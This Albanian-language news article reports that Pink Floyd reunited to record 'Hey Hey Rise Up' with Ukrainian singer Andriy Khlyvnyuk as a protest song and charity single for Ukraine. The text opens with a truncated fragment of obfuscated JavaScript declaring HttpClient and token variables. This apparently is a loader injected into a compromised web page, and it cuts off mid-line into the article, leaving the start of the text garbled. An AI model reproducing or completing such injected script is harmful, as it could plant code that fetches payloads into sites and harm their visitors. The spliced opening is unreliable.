;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

A jeni gati? Grupi legjendar rikthehet me këngë për Ukrainën

By

Pink Floyd janë ribashkuar për të regjistruar këngën e tyre të parë, të re pas 28 vjetësh, një këngë proteste kundër luftës në Ukrainë.

“Hey Hey Rise Up” përfshin anëtarët e Pink Floyd, David Gilmour dhe Nick Mason, me vokal nga këngëtari ukrainas, Andriy Khlyvnyuk, i grupit “BoomBox”.

Gilmour thotë se kënga është një shfaqje “zemërimi ndaj një superfuqie që pushton një komb paqësor”.

Por synohet gjithashtu si një nxitës moral për popullin e Ukrainës dhe një thirrje “për paqe”.

Puna për këngën filloi disa javë më parë, kur Gilmour u shfaq në Instagramin e Khlyvnyuk’s. Këngëtari kishte postuar pamjet e tij në sheshin Sofiyskaya të Kievit, plotësisht i armatosur dhe i gatshëm për të luftuar pushtimin rus.

Kënga u publikua në mesnatën e së premtes, ku të ardhurat do të shkojnë për ndihmën humanitare.

Kënga ka një rëndësi të veçantë për Gilmour, pasi nusja e tij është artistja me origjinë ukrainase Janina Pedan.

Ai i tha BBC-së se ajo kishte frymëzuar veprën artistike për këngën, e cila përmban lulen kombëtare të Ukrainës, luledielli.

“Nusja ime na tregoi historinë e një gruaje në fillim të këtij konflikti, duke u dhënë fara luledielli ushtarëve rusë dhe duke thënë se shpresonte që luledielli të mbinin aty ku vdisnin”.

Artikuj të ngjashëm